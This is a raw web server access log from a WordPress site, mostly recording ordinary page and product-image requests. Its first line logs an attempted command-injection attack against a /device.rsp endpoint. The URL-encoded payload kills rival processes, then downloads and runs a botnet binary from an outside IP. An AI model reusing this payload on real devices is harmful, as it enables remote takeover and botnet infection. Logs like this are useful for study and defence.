176.65.141.229 - - [18/Oct/2025:09:55:20 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=for%20pid%20in%20%2Fproc%2F%5B0-9%5D%2A%3B%20do%20case%20%24%28ls%20-l%20%24pid%2Fexe%29%20in%20%2A%27%28deleted%29%27%2A%7C%2A%27%2F.%27%2A%29%20kill%20-9%20%24%7Bpid%23%23%2A%2F%7D%20%3B%3B%20esac%3B%20done%3B%20while%20read%20-r%20line%3B%20do%20case%20%24line%20in%20%2A%22%2Fproc%2F%22%2A%29%20pid%3D%24%7Bline%23%23%2A%2Fproc%2F%7D%3B%20kill%20-9%20%24%7Bpid%25%25%20%2A%7D%3B%20%3B%3B%20esac%3B%20done%20%3C%20%2Fproc%2Fmounts%3Bcd%20%2Ftmp%3Brm%20arm7.urbotnetisass%3B%20wget%20http%3A%2F%2F94.154.35.154%2Farm7.urbotnetisass%3B%20chmod%20777%20%2A%3B%20.%2Farm7.urbotnetisass%20tbk HTTP/1.1" 404 8989 "-" "Mozila/5.0"
36.133.115.36 - - [18/Oct/2025:10:02:31 +0800] "POST /wp-cron.php?doing_wp_cron=1760752951.1189010143280029296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
113.204.3.195 - - [18/Oct/2025:10:02:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
113.204.3.195 - - [18/Oct/2025:10:02:31 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
113.204.3.195 - - [18/Oct/2025:10:02:31 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
113.204.3.195 - - [18/Oct/2025:10:02:35 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
113.204.3.195 - - [18/Oct/2025:10:02:35 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
113.204.3.195 - - [18/Oct/2025:10:02:35 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
113.204.3.195 - - [18/Oct/2025:10:02:35 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
113.204.3.195 - - [18/Oct/2025:10:02:38 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px.webp HTTP/1.1" 200 52418 "http://cqqizhou.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
113.204.3.195 - - [18/Oct/2025:10:02:38 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
